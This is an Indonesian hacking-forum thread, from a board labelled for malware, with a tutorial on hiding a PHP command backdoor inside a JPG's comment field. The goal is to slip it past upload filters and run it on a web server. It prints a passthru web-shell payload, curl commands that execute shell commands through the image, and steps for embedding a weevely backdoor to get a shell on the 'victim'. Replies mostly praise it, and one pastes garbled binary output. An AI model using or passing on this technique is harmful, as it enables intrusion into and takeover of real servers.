Manipulasi Backdoor php script ke file gambar, jpg* - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Malware - Malicious Software (https://www.indonesianbacktrack.or.id/forum/forum-151.html) +--- Thread: Manipulasi Backdoor php script ke file gambar, jpg* (/thread-1829.html) |
Manipulasi Backdoor php script ke file gambar, jpg* - zee eichel - 02-12-2012 hmm berhubung ada yang nanya ke ane melalui request zone di blog ane, mengenai membuat backdoor php yang kemudian disisipkan ke dalam jpg, ane buatkan saja tutornya secara langsung. Sering para pentester aplikasi web mengalami kesulitan pada saat melakukan injection yaitu saat memasukan backdoor melalui form-form, entah pada saat di dalam admin page atau pada form-form upload lainnya karena adanya filter yang hanya mengallowed file tertentu untuk di upload ke dalam server target. Yang di allowed dengan filterisasi ekstensi , biasanya hanya tipe-tipe file murni image antara lain .jpg. Sedangkan rata2 backdoor adalah berekstensi PHP. Yang jadi persoalan adalah Bagaimana kita bisa membuat file jpg ( gambar ) namun memiliki abiliti ( kemampuan ) menyimpan dan mengesekusi php script. ok langsung saja … pertama kita cari dulu file gambar .. ( extensi jpg, png ) hmm mbah google ajah.. ane cari gambar dengan keyword “perek” kwwkkwkw ternyata ane langsung memilih gambar yang lumayan seksi nih… biar sekalian ahhh hihihihih… Ok ane save gambar tersebut … dan simpan di direktori root … ckckckck that is amazing Ok .. ini spesifikasi percobaan Quote:1. Os yang ane gunakan : backtrack 5 R1 KDE 32 bit #note-1 : Quote:Target ane ini hanya ke localhost ane saja … coz ini hanya sebagai contoh percobaan ..and ane bukan depeser yang nyari2 celah sana-sini ( keenakan ntar pentest gratis ). Yang di butuhkan Quote:1. jhead ( install dengan melakukan apt-get install jhead ) Ok sekarang kita coba lakukan percobaan … 1. Menyisipkan cmd backdoor php dalam file jpg Ok sebagai percontohan percobaan ane coba menyisipkan php script pada file yang tadi sudah ane download sembarang dari google, “perek.jpg“, kita gunakan jhead. Kita periksa dulu mending file tersebut jgn2 sudah ada script atau comment. yup ternyata ada tuh .. kita remove semua script atau comment yang ada di pic tersebut ..dengan opsi -purejpg Ok setelah di murnikan , kita akan memasukan script kita kedalam gambar tersebut ., hmm kita gunakan testing terlebih dahulu .. kita masukan script di bawah ini .. Code: <?php passthru($_POST['cmd']); __halt_compiler(); dan jika sukses jhead akan memberitahukan kepada anda … terus cek klo script sudah masuk dengan baik Ok gambar tadi ( perek.jpg) yang telah di masukan script php tadi saya masukan kedalam localhost di /var/www ,hmm yaitu didalam folder "tesbd"… Code: root@eichel:~# mkdir /var/www/tesbd Ane buat file .httaccess pada direktori tesbd agar bisa “perek.jpg” diesekusi curl …Intinya sebenarnya hanya agar percobaan ini bisa sukses dengan mudah, jadi file httaccess akan mengallowed pemanggilan fungsi php tanpa harus memakai ekstensi php. Code: root@eichel:~# cd /var/www/tesbd/ Perhatikan untuk contoh kasus script yang ane masukin ini hanya berlaku kalau modul mime pada apache2 dalam keadaan aktif. dan minimal pada direktori tersetting AllowOverride FileInfo 2. Backdoor akses Ok kemudian ane coba akses dengan “curl” .. sukses .. Perhatikan gambar di atas , bahwa perintah pada opsi -d di atas sukses di esekusi cmd=id .. maka file backdoor akan menampilkan uid , gid akses. Coba kita tes perintah lain. Misalnya perintah “ls” dan “whoami“ 3. Back-connection Hal ini bisa dikembangkan sampai kita mendapatkan akses backconnect shell pada mesin target. Ok untuk taraf ini saya pakai weevely.py. tool ini dapat kita temukan pada direktori pentest pada backtrack 5 Code: root@eichel:/pentest/backdoors/web/weevely# Ok kita buat backdoor dengan weevely.py .. syntaxnya Code: weevely generate <password> <output_path> jadi ane buat backdoor dengan nama lohan.php serta password = 123manado nah nantinya pada direktori yang sama anda akan mendapatkan sebuah file yang telah anda ciptakan barusan, yaitu lohan.php. buka lohan.php dengan editor anda kemudian copy seluruh isi script phpnya. Seperti pada langkah pertama tadi , ketika kita sukses memasukan scirpt passthru pada langkah awal tadi , kita masukan isi script dari lohan.php ke file gambar tadi …ane copy perek.jpg ke perek1.jpg biar beda deh … Code: root@eichel:~# cp perek.jpg perek1.jpg Nah dengan menggunakan jhead ane berhasil memasukan isi script dari lohan.php ( hasil dari autogenerate weevely.py ) ke dalam file gambar baru yaitu perek1.jpg. Kemudian file perek1.jpg saya coba upload ke dalam localhost. Nah kembali lagi ke direktory weevely.py lalu mengakses file perek1.jpg .. dengan catatan file perek1.jpg sudah berada di dalam localhost wuiihh kita mendapatkan akses untuk masuk ke shell komputer korban yang diakses dari sebuah file berekstensi JPG!!! ok ini hanya sekedar contoh saja .. ane hanya ingin memberikan poc bahwa script php dapat di inject / disisipkan dalam file yang lain .. contohnya file jpg ( image file ). tinggal anda masukan script2 buatan anda yang mungkin lebih maknyos dan lebih banyak variasinya.. use your skill !!! Kita buka file php yang telah kita inject sciript php… hmmm tampaknya masih seperti file jpg biasa saja Ok ane saat ini lagi sama om mirwan a.k.a cassaprodigy dan om faisal a.k.a xsan-lahci mohon undur diri dari hadapan anda.. sampai jumpa lagi di thread yang tak kalah menariknya ..tetaplah setia bersama forum tercinta kita … viva la backtrack RE: Manipulasi Backdoor php script ke file gambar, jpg* - xsan-lahci - 02-12-2012 wuih keren nih om zee praktekin aaahhh jhead bisa ngeliat gambarnya kapan di edit kaya pake tools digital forensics ya? mantaappp RE: Manipulasi Backdoor php script ke file gambar, jpg* - ekawithoutyou - 02-12-2012 muantap RE: Manipulasi Backdoor php script ke file gambar, jpg* - wcrod32 - 02-13-2012 keren om zee . . . bukmark buat belajar ya . . . RE: Manipulasi Backdoor php script ke file gambar, jpg* - shendo - 02-15-2012 nah ini dia yang ane tunggu2 dari tahun lalu...wkwkwkwkwkwkwk RE: Manipulasi Backdoor php script ke file gambar, jpg* - raphael noval - 02-15-2012 bro di bagian jhead -ce gambar.jpg itu gmna ya setelah paste scriptnya..?? udah di paste scriptnya tapi ga tau cara cara save nya.. tekannya apa bro..? RE: Manipulasi Backdoor php script ke file gambar, jpg* - faybby - 02-15-2012 ctrl+d dulu ah... RE: Manipulasi Backdoor php script ke file gambar, jpg* - zee eichel - 02-18-2012 (02-15-2012, 05:11 AM)raphael noval Wrote: bro di bagian itu vim txt biasa kok bro ... jadi control+A untuk write mode ... klo mau save teken esc lalu ":" tinggal enter RE: Manipulasi Backdoor php script ke file gambar, jpg* - oneeye - 02-18-2012 om zee..... kan saya udah gini Quote:root@bt:/var/www/tesbd# jhead marley.jpg Tapi pas di eksekusi seperti ini : Quote:curl -d cmd=id http://127.0.0.1/tesbd/marley.jpg Malah muncul tulisan acak"an seperti ini : [quote] �>��^ףsK�P.�X-����YD�Z�<2x�Y���u��tw�Cޛ�J���Qv��S�G���ݕM��uTW�#����.n>(}�K?����utm=���Q�}q |lL9�W��R ��{����w��t�&v����8ě��j�J�Kl��8�3��+ �yt����� c0G��P���~�,k��Ie�5��K[R��������B> /1z�)I$��@}#���>��atp�&���X(�J� ��{lCL���d��`6�s���\�A �-�QD� ��I [\vA3�g�� ���m����8��B,p���M RE: Manipulasi Backdoor php script ke file gambar, jpg* - Junior Riau - 02-24-2012 nice om ze,,tapi gambar pada ngacir om ,,pada ngilang |